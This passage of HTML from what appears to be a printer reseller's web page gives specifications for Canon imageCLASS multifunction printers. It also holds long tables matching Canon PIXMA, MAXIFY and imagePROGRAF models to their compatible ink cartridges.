workgroups.</p><ul><li>Print, Scan, Copy, Fax</li><li>Print Speed (A4): Up to 43ppm</li><li>Recommended monthly print volume: 2,000 - 7,500 pages</li><li>FPOT: 6.2secs. (A4)</li><li>Max. paper input capacity: Up to 2,300 sheets</li><li>Print Resolution: Up to 1200 x 1200dpi (equivalent)</li></ul><p>[maxbutton id=\"11\" ]</p>		\n			<h4>imageCLASS MF426dw</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/3ed8c0ae6e8d4e3c9c7122fec0cd35f4_imageclass-mf426dw_b1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/3ed8c0ae6e8d4e3c9c7122fec0cd35f4_imageclass-mf426dw_b1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/3ed8c0ae6e8d4e3c9c7122fec0cd35f4_imageclass-mf426dw_b1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p><strong>Compact 4-in-1 Black and White Multifunction for the smart business</strong></p><p>With cutting-edge features, the MF426dw is set to boost work productivity in the modern office.</p><ul><li>Print, Scan, Copy, Fax</li><li>Print Speed (A4): Up to 38ppm</li><li>Recommended monthly print volume: 750 - 4,000 pages</li><li>FPOT: 5.5secs. (A4)</li><li>Max. paper input capacity: Up to 900 sheets</li><li>Print Resolution: Up to 1200 x 1200dpi (equivalent)</li></ul><p>[maxbutton id=\"11\" ]</p>		\n			<h3>Cartridge Printers :-</h3>		\n		<table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>imagePROGRAF PRO-500</p></td><td width=\"208\"><p>Maintenance Cartridge MC-20</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Blue)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Chroma Optimizer)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Matte Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Photo Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Photo Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Photo Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Photo Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Red)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Yellow)</p></td></tr><tr><td width=\"170\"><p>MAXIFY iB4170</p></td><td width=\"208\"><p>PGI-2700 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Yellow)</p></td></tr><tr><td width=\"170\"><p>MAXIFY MB5070</p></td><td width=\"208\"><p>PGI-2700 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Yellow)</p></td></tr><tr><td width=\"170\"><p>MAXIFY MB5170</p></td><td width=\"208\"><p>PGI-2700 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Yellow)</p></td></tr><tr><td width=\"170\"><p>MAXIFY MB5370</p></td><td width=\"208\"><p>PGI-2700 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Yellow)</p></td></tr><tr><td width=\"170\"><p>MAXIFY MB5470</p></td><td width=\"208\"><p>PGI-2700 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA E3170</p></td><td width=\"208\"><p>CL-57 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-57S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-47 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E410</p></td><td width=\"208\"><p>CL-57 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-57S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-47 (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA E4270</p></td><td width=\"208\"><p>CL-57 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-57S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-47 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E470</p></td><td width=\"208\"><p>CL-57 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-57S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-47 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E477</p></td><td width=\"208\"><p>CL-57S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-47 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E480</p></td><td width=\"208\"><p>CL-57 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-47 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E510</p></td><td width=\"208\"><p>CL-98 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-88 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E560</p></td><td width=\"208\"><p>CL-99 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-89 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E560 / E560R</p></td><td width=\"208\"><p>CL-99 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-89 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA G1000</p></td><td width=\"208\"><p>GI-790 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA G1010</p></td><td width=\"208\"><p>GI-790 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA G2010</p></td><td width=\"208\"><p>GI-790 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA G3000</p></td><td width=\"208\"><p>GI-790 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA G3010</p></td><td width=\"208\"><p>GI-790 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA G4010</p></td><td width=\"208\"><p>GI-790 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP100</p></td><td width=\"208\"><p>CLI-36 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-35 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP110</p></td><td width=\"208\"><p>CLI-36 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-35 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP110 (with battery)</p></td><td width=\"208\"><p>CLI-36 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-35 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP1300</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\"><p>PIXMA iP2770 / iP2772</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP2870S</p></td><td width=\"208\"><p>CL-746 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745S (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA iP4200</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP7270</p></td><td width=\"208\"><p>CLI-751 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP8770</p></td><td width=\"208\"><p>CLI-751 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iX6770</p></td><td width=\"208\"><p>CLI-751 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750XL (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-755XXL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iX6870</p></td><td width=\"208\"><p>CLI-751 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750XL (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-755XXL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MG2570S</p></td><td width=\"208\"><p>CL-746 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745S (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MG2577S</p></td><td width=\"208\"><p>CL-746 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745S (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745XL (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA MG3570</p></td><td width=\"208\"><p>CL-741 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-741XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740/CL-741 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MG3670</p></td><td width=\"208\"><p>CL-741 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-741XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740/CL-741 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MG7570</p></td><td width=\"208\"><p>CLI-751 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP160</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\"><p>PIXMA MP170</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\"><p>PIXMA MP180</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\"><p>PIXMA MP228</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-831 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-830 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP237</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP245</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP258</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP276</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA MP287</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP460</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\"><p>PIXMA MP476</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-831 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-830 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP486</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP496</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP497</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP500</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP520</p></td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP530</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td 